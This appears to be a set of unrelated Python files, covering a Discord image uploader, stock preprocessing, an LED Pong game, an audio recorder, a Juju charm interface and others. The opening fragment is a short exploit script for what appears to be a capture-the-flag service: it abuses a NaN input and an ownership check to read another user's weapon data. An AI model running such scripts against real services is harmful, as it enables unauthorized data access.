            backoff_factor=backoff_factor,
            status_forcelist=status_forcelist,
        )
        adapter = HTTPAdapter(max_retries=retry)
        session.mount('http://', adapter)
        session.mount('https://', adapter)
        return session
class Object(object):
    # Simple attribute bag for ad-hoc user records below.
    pass
api = Api("0.0.0.0:9000")
# Register a throwaway user with random credentials.
user = Object()
user.name = str(uuid.uuid4())
user.password = str(uuid.uuid4())
api.register(user.name, user.password)
# Vuln 1.
# Claim a weapon with force="NaN" and probe the test endpoint with it.
weapon_name = str(uuid.uuid4())
api.add_claimed_weapon(weapon_name, False, "NaN", "")
jw_list = api.get_juberwocky_list()
w_list = api.get_weapon_list()
result = api.test_weapon(jw_list[0], weapon_name)
print(result.content)
# Vuln 2.
# Switch to a second user who does not own the weapon.
user = Object()
user.name = str(uuid.uuid4())
user.password = str(uuid.uuid4())
api.register(user.name, user.password)
# forbidden weapon claimed
result = api.get_weapon(weapon_name)
print(result)
# Wait past the 10-minute cleanup window, then re-read the weapon.
sleep(60 * 11)
# index cleaned up weapon shared
weapon = api.get_weapon(weapon_name)
print(weapon)
"""Module used for creating the "urls.json" file"""
import json
import pathlib
import discord
from more_itertools import chunked
__all__ = ['upload_images', 'save_image_urls', 'get_card_image_file', 'get_card_image_url']

# Local card images and the JSON file mapping card names to uploaded URLs.
_CARD_IMG_PATH = pathlib.Path('data/images/cards')
_CARD_IMG_URLS_PATH = _CARD_IMG_PATH / 'urls.json'
# In-memory card-name -> URL cache, loaded best-effort at import time.
_card_image_urls = {}
try:
    with open(_CARD_IMG_URLS_PATH) as f:
        urls = json.load(f)
except Exception:
    # Missing or corrupt urls.json is non-fatal: log and start empty.
    import logging
    logging.exception(f'Error occured when loading {_CARD_IMG_URLS_PATH}')
else:
    _card_image_urls.update(urls)
async def upload_images(channel):
    """Upload the images to Discord and return the resulting attachments"""
    url_map = {}
    # Discord allows at most 10 attachments per message.
    for batch in chunked(_CARD_IMG_PATH.glob('*.png'), 10):
        attachment_files = [discord.File(str(path.resolve())) for path in batch]
        message = await channel.send(files=attachment_files)
        for attachment in message.attachments:
            url_map[attachment.filename.replace('-', ' ')] = attachment.url
    return url_map
async def save_image_urls(channel, filename=_CARD_IMG_URLS_PATH):
    """Like upload_images but saves the resulting dict into a file."""
    url_map = await upload_images(channel)
    with open(filename, 'w') as url_file:
        json.dump(url_map, url_file, indent=4, separators=(',', ': '))
def get_card_image_file(card):
    """Return a Path object containing the location of the image of the card."""
    image_name = f'{card.rank.short}-of-{card.suit.name}s.png'
    return _CARD_IMG_PATH / image_name
def get_card_image_url(card):
    """Return the URL of the image of the card, or None if unknown."""
    lookup_key = str(card)
    return _card_image_urls.get(lookup_key)
|
import tslearn
import numpy as np
import pandas as pd
from tslearn.preprocessing import TimeSeriesScalerMinMax
from tslearn.piecewise import PiecewiseAggregateApproximation as PAA
import matplotlib.pyplot as plt
import os, argparse
import json
ap = argparse.ArgumentParser()
# --dimrec 1 enables PAA dimensionality reduction below.
ap.add_argument("--dimrec", type = int, choices = [0, 1], required = True, default = 0)
dimrec = ap.parse_args().dimrec
n_segments = 10
# Reading data
stocks_df = pd.read_csv("data/stocks.csv")
# Formatting the date column
stocks_df.date = pd.to_datetime(stocks_df.date, format='%d/%m/%Y')
# Dropping column with many missing values
stocks_df.drop(columns = ["SAMIR", "Diac Salaf", "Aradei Capital", "Mutandis", "Immr Invest"], inplace = True)
# Filling other missing values (forward- then back-fill for leading gaps)
stocks_df = stocks_df.ffill()
stocks_df = stocks_df.bfill()
# Resample daily data into weekly data
stocks_df = stocks_df.resample('7D', on = 'date').first().reset_index(drop = True)
# setting date as index
stocks_df.index = stocks_df.date
stocks_df.drop("date", axis = 1, inplace = True)
cols = stocks_df.columns
if not os.path.isdir("plots"):
    os.mkdir("plots")
# 10x7 grid of per-stock line plots (assumes exactly 70 remaining columns).
fig, axs = plt.subplots(10,7,figsize=(35,35))
for i in range(10):
    for j in range(7):
        axs[i, j].plot(stocks_df[cols[i*7+j]].values)
        axs[i, j].set_title(cols[i*7+j])
plt.savefig('plots/timeseries.jpeg')
# Normalize and reshape time series to (n_series, n_timesteps, 1)
ts = np.array(stocks_df.T).reshape(stocks_df.T.shape[0], stocks_df.T.shape[1], 1)
ts = TimeSeriesScalerMinMax().fit_transform(ts)
# Run PAA (if specified)
def run_paa(ts, n_segments):
    """Reduce each series in *ts* to *n_segments* via Piecewise Aggregate Approximation."""
    print("running PAA")
    transformer = PAA(n_segments = n_segments)
    return transformer.fit_transform(ts)
if dimrec:
    ts = run_paa(ts, n_segments)
# Persist both the cleaned dataframe and the (optionally reduced) matrix.
stocks_df.to_csv("data/processed_df.csv")
np.savetxt("data/data_preprocessed.csv", ts.reshape(ts.shape[0], ts.shape[1]))
|
# Demonstrates the `in` substring operator; prints True.
sentence = 'hello'
print('hello' in sentence)
|
import objects
import ledmatrixdrawer
import object_playground
import points
# import random_blocks
import rgbleddrawer
import controller
import pygame
import numbertoblock
import datetime
import Pong_collisions
import gamespeed
import time
import random
import Ball_Steuerung
def titlescreen(rgb: "rgbleddrawer.RgbLedDrawer", playground: "object_playground.Playground", ball, paddle_top, paddle_bot):
    """Place both paddles and the ball in their start positions on *playground*.

    Fixed: the ``rgb`` annotation called ``RgbLedDrawer()``, constructing a
    hardware driver at function-definition time as an import side effect;
    it now annotates with the class (as a forward reference) instead.
    NOTE(review): *rgb* itself is currently unused by the body.
    """
    paddle_top.posx = 4
    paddle_bot.posx = 4
    paddle_top.posy = 0
    paddle_bot.posy = 19
    ball.posx = 5
    playground.add_object(paddle_top, paddle_top.posx, paddle_top.posy)
    playground.add_object(paddle_bot, paddle_bot.posx, paddle_bot.posy)
    ball.posy = 7
    playground.add_object(ball, ball.posx, ball.posy)
def run_game():
    """Run one full Pong match (first to 3 points) on the LED hardware.

    Player 1 controls the top paddle via joystick 0; the bottom paddle is
    bot-controlled.  Scores are shown on the red LED matrix.
    """
    # variables for objects
    paddle_left = objects.object_list[0]
    paddle_right = objects.object_list[1]
    paddle_top = objects.object_list[2]
    paddle_bot = objects.object_list[3]
    ball = objects.object_list[4]
    # Random coin flip deciding which side serves first.
    anfang = random.random()
    # Some stuff needed by PyGame
    pygame.init()
    gameover_sound = pygame.mixer.Sound('./Music/GameOver.wav')
    abpraller_sound = pygame.mixer.Sound('./Music/break.wav')
    fail = pygame.mixer.Sound('./Music/fail_sound.wav')
    # use Joystick and Controller
    pygame.joystick.init()
    joystick = pygame.joystick.Joystick(0)
    joystick.init()
    joystick2 = pygame.joystick.Joystick(1)
    joystick2.init()
    gamepad = controller.Controller(joystick)
    gamepad2 = controller.Controller(joystick2)
    # drawer for playfield
    rgb_led_drawer = rgbleddrawer.RgbLedDrawer()
    # drawer for scoreboard
    led_matrix_drawer = ledmatrixdrawer.LedMatrixDrawer()
    # Playgrounds
    color_playground = object_playground.Playground(20, 10)
    red_playground = object_playground.Playground(8, 32)
    color_playground.clear()
    titlescreen(rgb_led_drawer, color_playground, ball, paddle_top, paddle_bot)
    # Prepare red_playgound to repaint...
    # red_playground.clear()
    # color_playground.clear()
    # Add preview block to red_playgound
    i = 0
    # Initial positions: paddles centered, ball on the serving side.
    paddle_top.posx = 4
    paddle_bot.posx = 4
    paddle_top.posy = 0
    paddle_bot.posy = 19
    ball.posx = 5
    color_playground.add_object(paddle_top, paddle_top.posx, paddle_top.posy)
    color_playground.add_object(paddle_bot, paddle_bot.posx, paddle_bot.posy)
    if anfang > 0.5:
        ball.posy = 7
        color_playground.add_object(ball, ball.posx, ball.posy)
        ball.orientation_y = 1
    else:
        ball.posy = 12
        color_playground.add_object(ball, ball.posx, ball.posy)
        ball.orientation_y = -1
    # draw red_playgound
    rgb_led_drawer.draw_playground(color_playground)
    led_matrix_drawer.draw_playground(red_playground)
    color_playground.clear()
    red_playground.clear()
    score1 = 0
    score2 = 0
    # gamestruktur
    game_over = False
    while game_over == False:
        # One rally per iteration of the inner loop below.
        Runde = 0
        Ball_Steuerung.Ball_Steuerung.ball_orientation(Ball_Steuerung.Ball_Steuerung, ball)
        # Frame delay shrinks as total score grows -> game speeds up.
        time_to_wait = 500 - 50 * (score1 + score2)
        ball.posx = 5
        while True:
            Runde += 1
            gamepad.Paddle_Steuerung(paddle_top)
            # Clamp the player paddle to the 0..7 column range.
            while paddle_top.posx > 7:
                paddle_top.posx -= 1
            while paddle_top.posx < 0:
                paddle_top.posx += 1
            # bot_steuerung_mit_fail(paddle_top,ball)
            #gamepad2.Paddle_Steuerung(paddle_bot)
            #while paddle_bot.posx > 7:
                #paddle_bot.posx -= 1
            #while paddle_bot.posx < 0:
                #paddle_bot.posx += 1
            bot_steuerung_mit_fail(paddle_bot, ball, score1)
            color_playground.add_object(paddle_top, paddle_top.posx, paddle_top.posy)
            color_playground.add_object(paddle_bot, paddle_bot.posx, paddle_bot.posy)
            red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score1), 0, 0)
            red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score2), 24, 0)
            # Bounce off the left/right walls.
            if ball.posx == 0:
                Runde += 1
                ball.orientation_x = -ball.orientation_x
                pygame.mixer.Sound.play(abpraller_sound)
            if ball.posx == 9:
                Runde += 1
                ball.orientation_x = -ball.orientation_x
                pygame.mixer.Sound.play(abpraller_sound)
            # Bounce off a paddle at the ball's next position.
            if Pong_collisions.Collision_Dedektor.with_object(Pong_collisions.Collision_Dedektor, color_playground, ball, ball.posx + ball.orientation_x, ball.posy + ball.orientation_y) == True:
                Runde += 1
                ball.orientation_y = -ball.orientation_y
                pygame.mixer.Sound.play(abpraller_sound)
            if time_to_wait > 0:
                time_to_wait -= 10
            # Ball escaped past the top paddle: point for player 2.
            if object_is_above_beginning(ball) == True:
                score2 += 1
                ball.posy = 12
                red_playground.clear()
                red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score1), 0, 0)
                red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score2), 24, 0)
                led_matrix_drawer.draw_playground(red_playground)
                break
            # Ball escaped past the bottom paddle: point for player 1.
            if object_is_below_bottom(ball) == True:
                score1 += 1
                ball.posy = 7
                red_playground.clear()
                red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score1), 0, 0)
                red_playground.add_block(numbertoblock.NumberToBlock.get_block_einzelne_zahl(score2), 24, 0)
                led_matrix_drawer.draw_playground(red_playground)
                pygame.mixer.Sound.play(fail)
                break
            # Advance the ball and repaint both displays.
            ball.posx = ball.posx + ball.orientation_x
            ball.posy = ball.posy + ball.orientation_y
            color_playground.add_object(ball, ball.posx, ball.posy)
            rgb_led_drawer.draw_playground(color_playground)
            led_matrix_drawer.draw_playground(red_playground)
            color_playground.clear()
            red_playground.clear()
            pygame.time.wait(time_to_wait - Runde)
        # First player to 3 points wins the match.
        if score1 == 3:
            pygame.time.wait(3000)
            game_over = True
            break
        if score2 == 3:
            pygame.time.wait(3000)
            game_over = True
            break
    pygame.time.wait(3000)
    color_playground.clear()
    red_playground.clear()
    pygame.mixer.Sound.play(gameover_sound)
    # Spiel
    pygame.time.wait(5000)
    # Release the display drivers before the next match re-creates them.
    del led_matrix_drawer
    del rgb_led_drawer
    pygame.event.get()
def object_is_above_beginning(object):
    """True when *object* has reached or passed the top row (y <= 0)."""
    return object.posy <= 0
def object_is_below_bottom(object):
    """True when *object* has reached or passed the bottom row (y >= 19)."""
    return object.posy >= 19
def check_for_full_lines(calculator, color_playground, full_line_detector, score):
    """Delete all completed lines from the playground and return the new score."""
    full_lines = full_line_detector.detect_lines(color_playground)
    full_line_detector.delete_full_lines(full_lines, color_playground)
    return calculator.points(score, len(full_lines), 0)
def round(b: object, b1: object, b2: object, c: Pong_collisions.Collision_Dedektor, p: object_playground, bs: Ball_Steuerung, joy1,
          joy2):
    """Advance the ball one step via the ball controller.

    NOTE(review): shadows the builtin ``round``; joystick paddle control
    is currently disabled.
    """
    Ball_Steuerung.position_calculator(bs, p, b1, b2, c, b)
    # Controller.Paddle_Steuerung(joy1, b1)
    # Controller.Paddle_Steuerung(joy2, b2)
def bot_steuerung_mit_fail(s:object,b:object,score1):
    """Bot paddle step that randomly skips moves; skips less as *score1* rises."""
    # Higher player score lowers the skip threshold (handicap for the bot).
    handicap = {1: 0.5, 2: 1}.get(score1, 0)
    fail = random.random()
    if fail > 0.3 - handicap:
        if s.posx - b.posx >= 0 and s.posx > 0:
            s.posx -= 1
        if s.posx - b.posx + 2 <= 0 and s.posx < 7:
            s.posx += 1
def bot_steuerung(s:object,b:object):
    """Move bot paddle *s* one step toward ball *b* (paddle is 3 cells wide)."""
    if s.posx - b.posx >= 0 and s.posx > 0:
        s.posx -= 1
    if s.posx - b.posx + 2 <= 0 and s.posx < 7:
        s.posx += 1
if __name__ == "__main__":
    # Restart a new match forever; exit only via exception/Ctrl-C.
    while True:
        run_game()
|
from google_images_download import google_images_download
import json
from PIL import Image
import os
import time
import tensorflow as tf
def verify_image(img_file, sess):
    """Return True iff *img_file* contains valid JPEG data.

    :param img_file: path to the candidate image file.
    :param sess: an open TensorFlow session used to evaluate tf.image.is_jpeg.
    :returns: True for valid JPEG content, False on any read/decode failure.
    """
    try:
        # BUG FIX: the file handle was never closed; use a context manager.
        with open(img_file, 'rb') as v_image:
            return sess.run(tf.image.is_jpeg(v_image.read()))
    except Exception:
        # Unreadable/missing file or TF evaluation failure: treat as invalid.
        # (Was a bare `except:`, which also swallowed KeyboardInterrupt.)
        return False
def read_config(file_name):
    """Parse *file_name* as JSON and return the resulting object."""
    with open(file_name) as handle:
        return json.load(handle)
def main():
    """Download labeled image sets from Google Images per config.json, then
    validate and sequentially rename the results.

    Side effects: network downloads into ./downloads/<label>/, deletion of
    invalid files, and in-place renames to <idx>.jpg.
    """
    config = read_config('config.json')
    # Per-label "count" overrides this global default.
    defaultImageCount = config.get("defaultImageCount", 100)
    fetcher = google_images_download.googleimagesdownload()
    for label in config["labels"]:
        count = label.get("count", defaultImageCount)
        name = label['name']
        if 'suffix' in label:
            # One query per suffix, all saved under the same label directory.
            for suffix in label['suffix']:
                print(suffix)
                absolute_image_paths = fetcher.download(
                    {"keywords": name + ' ' + suffix, "image_directory": name, "limit": count, "format": "jpg"})
        else:
            absolute_image_paths = fetcher.download(
                {"keywords": name, "image_directory": name, "limit": count, "format": "jpg"})
    # NOTE(review): tf.InteractiveSession is TF1.x-only API — confirm the
    # pinned tensorflow version before upgrading.
    sess = tf.InteractiveSession()
    # idx is global across all label directories, so file names are unique
    # per directory but not dense within one.
    idx = 0
    for root, dirs, files in os.walk(os.path.join(os.getcwd(), 'downloads')):
        for file in files:
            currentFile = os.path.join(root, file)
            # test image
            if not verify_image(currentFile, sess):
                print('removed')
                os.remove(currentFile)
                continue
            newFileName = os.path.join(root, str(idx) + ".jpg")
            os.rename(currentFile, newFileName)
            idx = idx + 1
if __name__ == '__main__':
main()
|
import datetime
from propagators.base import Propagator
from astropy.coordinates import EarthLocation, GCRS
from astropy.time import Time
from astropy import units as u
from simpy.core import Environment
from typing import (
List,
Dict,
Tuple,
Any,
Iterator,
Optional,
Type,
Callable,
Generator,
Iterable,
Union as typeUnion,
)
class GeoPoint(Propagator):
    """Propagator for a fixed geodetic point on Earth.

    The point never moves; its geodetic location is constant and its GCRS
    (inertial) coordinates vary only through Earth rotation at the epoch
    derived from simulation time.
    """

    def __init__(
        self, env: Environment, name: str, configuration: Dict[str, Any]
    ) -> None:
        super().__init__(env, name, configuration)
        # Geodetic position from configuration (degrees / km), defaulting to 0.
        self.lat: typeUnion[str, float] = configuration.get("Lat_deg", 0.0)
        self.lon: typeUnion[str, float] = configuration.get("Lon_deg", 0.0)
        self.alt: typeUnion[str, float] = configuration.get("Alt_km", 0.0)
        self.angle_off_north: typeUnion[str, float] = configuration.get(
            "angle_off_north_deg", 0.0
        )
        # Ground point: velocity is always zero.
        self.velocity: float = 0.0
        self._el = EarthLocation.from_geodetic(
            self.lon * u.deg, self.lat * u.deg, self.alt * u.km
        )

    def getLocationAtSimtime(
        self, simtime: Optional[float] = None
    ) -> Tuple[Tuple[Any, Any, Any], Tuple[Any, Any, Any]]:
        """Return ((lat_deg, lon_deg, alt_km), (0, 0, 0)) at *simtime*.

        :param simtime: simulation time in seconds; None means "now".
        """
        # BUG FIX: `if not simtime` also fired for simtime == 0.0, silently
        # substituting env.now; only None means "use the current sim time".
        if simtime is None:
            simtime = self.env.now
        #!TODO Incorporate velocity
        return (
            self._el.lat.to(u.deg).value,
            self._el.lon.to(u.deg).value,
            self._el.height.to(u.km).value,
        ), (0, 0, 0)

    def getCoordsAtSimtime(
        self, simtime: Optional[float] = None
    ) -> Tuple[Tuple[Any, Any, Any], Tuple[Any, Any, Any]]:
        """Return the GCRS cartesian position (km) and zero velocity at *simtime*.

        :param simtime: simulation time in seconds; None means "now".
        """
        # BUG FIX: same falsy-zero bug as getLocationAtSimtime.
        if simtime is None:
            simtime = self.env.now
        #!TODO Incorporate velocity
        # Convert sim-relative seconds to an absolute (naive-UTC) epoch.
        epoch_time = (self.env.epoch + datetime.timedelta(seconds=simtime)).replace(
            tzinfo=None
        )
        time_epoch_time = Time(epoch_time.isoformat(), format="isot", scale="utc")
        # Earth-fixed (ITRS) -> inertial (GCRS) at the requested obstime.
        itrs = self._el.get_itrs(obstime=time_epoch_time)
        gcrs = itrs.transform_to(GCRS(obstime=time_epoch_time))
        return (
            gcrs.cartesian.x.to(u.km),
            gcrs.cartesian.y.to(u.km),
            gcrs.cartesian.z.to(u.km),
        ), (0, 0, 0)
|
from tkinter import Tk , Label , Button , PhotoImage;
from tkinter.ttk import Progressbar;
from tkinter.filedialog import asksaveasfile
from threading import Thread;
from os import remove , fdopen;
from sys import getsizeof;
from tempfile import mkstemp;
from time import time , sleep , strftime , gmtime;
import wave;
import pyaudio;
import audioop;
import numpy as np;
class MainWin(Tk) :
    """Tk window that records microphone audio into a temp file and saves it
    as a WAV on stop.

    Layout (one row): data-size label | level progress bar | elapsed-time
    label | record/pause button | stop button. Space bar toggles recording.
    """
    def __init__(self,title) :
        Tk.__init__(self);
        self.title(title);
        self.resizable(False,False);
        self.geometry("500x50")
        self.columnconfigure(1,weight=1);
        self.rowconfigure(0,weight=1);
        self._part();
        # count: elapsed recording seconds (advanced in 0.2s steps)
        self.count= 0;
        # size: approximate bytes captured so far (via getsizeof per buffer)
        self.size = 0;
        # stop: set by the stop button; the audio callback then finalizes
        self.stop = False;
        # play: True while actively recording (record/pause toggle)
        self.play = False;
        # starter: True until the first recording is started
        self.starter = True;
    def _part(self) :
        """Build and grid all widgets; load button icons when present."""
        self.dataSize = Label(self,text="0B".center(10," "))
        self.dataSize.grid(row=0,column=0,padx=10,sticky="ew");
        self.progressBar = Progressbar(self,mode="determinate")
        self.progressBar["maximum"] = 100;
        self.progressBar.grid(row=0,column=1,ipady=3,sticky="ew");
        self.clockLabel = Label(self,text="00:00:00");
        self.clockLabel.grid(row=0,column=2,padx=10,sticky="ew");
        self.actionBtn = Button(self,text="jesus",relief="flat",command=self._onAction);
        self.actionBtn.grid(row=0,column=3,padx=5);
        self.stopBtn = Button(self,text="jesus",relief="flat",state="disabled",command=self._onStop);
        self.stopBtn.grid(row=0,column=4,padx=5);
        # Icon loading is best-effort: keep the text label if img/ is missing.
        try : image = PhotoImage(file="img/play.png")
        except : pass;
        else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
        try : image = PhotoImage(file="img/stop.png")
        except : pass;
        else : self.stopBtn.configure(image=image);self.stopBtn.img = image;
        self.bind("<space>" , lambda x : self._onAction());
    def voice(self) :
        """Open the PyAudio input stream; all work happens in `callback`."""
        def callback(inData,frameCount,timeInfo,statues) :
            # Runs on PyAudio's capture thread for every incoming buffer.
            if self.stop :
                # Finalize: copy the raw temp data into a user-chosen WAV.
                file = open(self.nameTemp,"rb")
                binaries = b''.join(file.readlines())
                pathName = self.saveFile();
                if pathName != None :
                    # Stereo, 16-bit, 44.1 kHz — must match the open() below.
                    waveFile = wave.open(pathName, 'wb')
                    waveFile.setnchannels(2)
                    waveFile.setsampwidth(audio.get_sample_size(pyaudio.paInt16))
                    waveFile.setframerate(44100)
                    waveFile.writeframes(binaries)
                    waveFile.close()
                file.close();
                self.fileTemp.close();
                remove(self.nameTemp);
                self.reset()
                return (inData,pyaudio.paComplete);
            else :
                # Level meter: average |amplitude| scaled into 0..100.
                # NOTE(review): np.fromstring is deprecated in modern NumPy;
                # np.frombuffer is the drop-in replacement — confirm version.
                vis = np.fromstring(inData,dtype=np.int16);
                peak = np.average(np.abs(vis))*2;
                self._updateProgressBar(int(int(peak)*100/2**16));
                if self.play :
                    #print(inData)
                    self.fileTemp.write(inData);
                    self.size += getsizeof(inData);
                    self.dataSize.configure(text=self.formateSize(self.size))
                    return (inData,pyaudio.paContinue);
                else : return (inData,pyaudio.paContinue);
        audio = pyaudio.PyAudio();
        # NOTE(review): `stream` is never started/stopped/closed explicitly;
        # capture presumably begins immediately because input=True — confirm.
        stream = audio.open(
            format=pyaudio.paInt16,
            channels=2,
            rate=44100,
            input=True,
            frames_per_buffer=1024,
            stream_callback=callback
        );
    def _changeFlags(self) :
        """Toggle play/pause and swap the action button icon accordingly."""
        if self.play : file = "img/play.png";self.play=False;
        else : file = "img/pause.png";self.play=True;
        try :
            image = PhotoImage(file=file);
        except : pass
        else : self.actionBtn.configure(image=image);self.actionBtn.img=image
    # Stop button handler: the audio callback observes this flag.
    def _onStop(self) : self.stop = True;
    # Set the level meter value (0..100).
    def _updateProgressBar(self,value) : self.progressBar["value"] = value;
    def _onAction(self) :
        """Record/pause handler: first use creates the temp file and opens capture."""
        self._changeFlags();
        if self.starter :
            self.starter = False;
            self.handlerTemp , self.nameTemp = mkstemp();
            self.fileTemp = fdopen(self.handlerTemp , "wb");
            self._updateTime();
            self.voice();
            self.stopBtn.configure(state="normal")
    @staticmethod
    def _startNewThread(func) :
        """Run *func* on a daemon thread (fire-and-forget helper)."""
        thread = Thread(target=func,args=());
        thread.setDaemon(True)
        thread.start();
    @staticmethod
    def saveFile() :
        """Ask the user for a .wav destination; return its path or None."""
        f = asksaveasfile(mode='wb', defaultextension=".wav")
        if f is None : return
        f.close()
        return f.name
    @staticmethod
    def formateSize(num, suffix='B') :
        """Render a byte count as a human-readable string (KiB/MiB/...)."""
        for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi'] :
            if abs(num) < 1024.0 :
                return "%3.1f%s%s" % (num, unit, suffix)
            num /= 1024.0;
        return ("%.1f%s%s" % (num, 'Yi', suffix));
    def reset(self) :
        """Restore the idle state after a recording has been saved."""
        try : image = PhotoImage(file="img/play.png")
        except : pass;
        else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
        try : image = PhotoImage(file="img/stop.png")
        except : pass;
        else : self.stopBtn.configure(image=image,state="disabled");self.stopBtn.img = image;
        self.size = 0;
        self.count = 0;
        self.starter = True;
        self.play = False;
        self.stop = False;
        self.progressBar["value"] = 0;
        self.dataSize.configure(text="0B".center(10," "))
        self.clockLabel.configure(text="00:00:00");
    def _updateTime(self) :
        """Advance the clock label every 200 ms while not stopped."""
        if self.stop : return;
        if self.play : self.count += 0.2;self.clockLabel.configure(text=str(strftime("%H:%M:%S", gmtime(self.count))));self.after(200,self._updateTime);
        else : self.after(200,self._updateTime);
    def run(self) :
        """Enter the Tk main loop (blocks until the window closes)."""
        self.mainloop();
# Launch the recorder GUI; blocks in the Tk main loop.
MainWin("jesus christ").run();
"""Utilities for genshin.py."""
from . import geetest
from .concurrency import *
from .ds import *
from .fs import *
from .logfile import *
from .uid import *
|
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import charms.reactive as reactive
class ManilaPluginProvides(reactive.RelationBase):
    """This is the subordinate end of the relation, i.e. the configuration
    provider to the manila plugin.

    The purpose of the provides side of the interface is to provide the manila
    charm with configuration information to correctly link to whatever the
    plugin wants to do, e.g. for a backend, to configure manila to use the
    appropriate backend.

    The manila charm provides the service user manila, and other authentication
    information that it can use to configure other services in the OpenStack
    system.
    """
    # A single global conversation: this interface talks to one manila charm.
    scope = reactive.scopes.GLOBAL
    # These remote data fields will be automatically mapped to accessors
    # with a basic documentation string provided.
    auto_accessors = ['_authentication_data']
    class states():
        # Relation state names, templated with the relation name at runtime.
        connected = '{relation_name}.connected'
        available = '{relation_name}.available'
        changed = '{relation_name}.changed'
    @reactive.hook('{provides:manila-plugin}-relation-joined')
    def joined(self):
        """Mark the relation connected and recompute derived states."""
        conversation = self.conversation()
        conversation.set_state(self.states.connected)
        self.update_status()
    @reactive.hook('{provides:manila-plugin}-relation-changed')
    def changed(self):
        """This hook is used to indicate that something has changed on the
        interface and that interested parties should recheck the properties
        exposed to see if they need to do anything.

        The handler should clear the state after it has been consumed so that
        the next change gets registered too.
        """
        self.update_status()
    @reactive.hook('{provides:manila-plugin}-relation-{broken,departed}')
    def departed(self):
        """Drop all relation states when the relation goes away."""
        conversation = self.conversation()
        conversation.remove_state(self.states.connected)
        conversation.remove_state(self.states.available)
        conversation.remove_state(self.states.changed)
    def update_status(self):
        """Set the .available and .changed state if both the plugin name and
        the authentication data are available.

        Note that the .changed state can be used if the plugin changes the
        data. Thus, a subordinate charm (e.g. generic backend) can watch
        .changed and then clear it using the method clear_changed() to update
        configuration files as needed.

        The interface will NOT set .changed without having .available at the
        same time. Also, the interface will not set .changed unless the
        authentication data has changed.
        """
        auth_data = self._authentication_data()
        conversation = self.conversation()
        if auth_data is not None:
            conversation.set_state(self.states.available)
            scope = conversation.scope
            # Compare against the locally cached copy so .changed only fires
            # on a genuine update of the remote data.
            local_auth_data = self.get_local('_authentication_data',
                                             default=None,
                                             scope=scope)
            if (local_auth_data is None or local_auth_data != auth_data):
                conversation.set_state(self.states.changed)
                conversation.set_local(_authentication_data=auth_data,
                                       scope=scope)
    def clear_changed(self):
        """Provide a convenient method to clear the .changed relation"""
        try:
            self.remove_state(self.states.changed)
        except ValueError:
            # work around Juju 1.25.x error where it can't find the scope for
            # the interface (randomly) - Bug #1663633
            pass
    @property
    def name(self):
        """Returns the name if it has been set"""
        scope = self.conversations()[0].scope
        return self.get_local('_name', default=None, scope=scope)
    @name.setter
    def name(self, name):
        """Set the name plugin -- this is for logs, and to distinguish between
        multiple plugins.

        :param name: a string indicating the name of the plugin (or None)
        """
        scope = self.conversations()[0].scope
        # Record locally and publish to the remote end of the relation.
        self.set_local(_name=name, scope=scope)
        self.set_remote(_name=name, scope=scope)
    @property
    def authentication_data(self):
        """Return authentication data provided by the Manila charm, or None if
        the data has not yet been set.

        The authentication data is set when the Manila charm has received it
        over its identity interface; thus this may return None until that data
        has become available. This means that the configuration data may be
        delayed until this is available.

        The authentication data format is:
        {
            'username': <value>
            'password': <value>
            'project_domain_id': <value>
            'project_name': <value>
            'user_domain_id': <value>
            'auth_uri': <value>
            'auth_url': <value>
            'auth_type': <value> # 'password', typically
        }
        :returns: data object that was passed.
        """
        data = self._authentication_data()
        if data is None:
            return None
        # Remote data is wrapped as {"data": ...} JSON; unwrap it here.
        return json.loads(data)["data"]
    @property
    def configuration_data(self):
        """Get the configuration data (if it has been set yet) or None"""
        scope = self.conversations()[0].scope
        data = self.get_local('_configuration_data', default=None, scope=scope)
        if data is None:
            return
        return json.loads(data)["data"]
    @configuration_data.setter
    def configuration_data(self, data):
        """
        NOTE that the data is wrapped in a dictionary, converted to JSON and
        then placed in the juju remote variable. The other 'end' unpacks this
        and provides the original data to the Manila charm.

        If complete is False (or missing) then the configuration data is only
        partially complete OR the subordinate charm is not ready yet -- e.g. it
        still has to configure something.

        The format of the data is:
        {
            "complete": <boolean>,
            '<config file>': ""
        }
        Note that the string for the <config file> should be suitable for
        replacing/adding into the configuration file specified.
        Thus data has to be JSONable.

        :param data: object that describes the plugin data to be sent.
        """
        scope = self.conversations()[0].scope
        self.set_local(_configuration_data=json.dumps({"data": data}),
                       scope=scope)
        self.set_remote(_configuration_data=json.dumps({"data": data}),
                       scope=scope)
|
import random
import speech_recognition as sr
import time
from .transcribe import recognize_speech_from_mic
def test_speech_recognition():
    """Play a guess-the-word game over the microphone.

    Picks a random word, then gives the user NUM_GUESSES attempts; each
    attempt allows up to PROMPT_LIMIT re-prompts when nothing was understood.

    Side effects: reads from the default microphone and prints to stdout.
    """
    # set the list of words, max number of guesses, and prompt limit
    WORDS = ["apple", "banana", "grape", "orange", "mango", "lemon"]
    NUM_GUESSES = 3
    PROMPT_LIMIT = 5
    # create recognizer and mic instances
    recognizer = sr.Recognizer()
    microphone = sr.Microphone()
    # get a random word from the list
    word = random.choice(WORDS)
    # format the instructions string
    instructions = (
        "I'm thinking of one of these words:\n"
        "{words}\n"
        "You have {n} tries to guess which one.\n"
    ).format(words=', '.join(WORDS), n=NUM_GUESSES)
    # show instructions and wait 3 seconds before starting the game
    print(instructions)
    time.sleep(3)
    for i in range(NUM_GUESSES):
        # get the guess from the user
        # if a transcription is returned, break out of the loop and
        #     continue
        # if no transcription returned and API request failed, break
        #     loop and continue
        # if API request succeeded but no transcription was returned,
        #     re-prompt the user to say their guess again. Do this up
        #     to PROMPT_LIMIT times
        for j in range(PROMPT_LIMIT):
            print('Guess {}. Speak!'.format(i+1))
            guess = recognize_speech_from_mic(recognizer, microphone)
            if guess["transcription"]:
                break
            if not guess["success"]:
                break
            print("I didn't catch that. What did you say?\n")
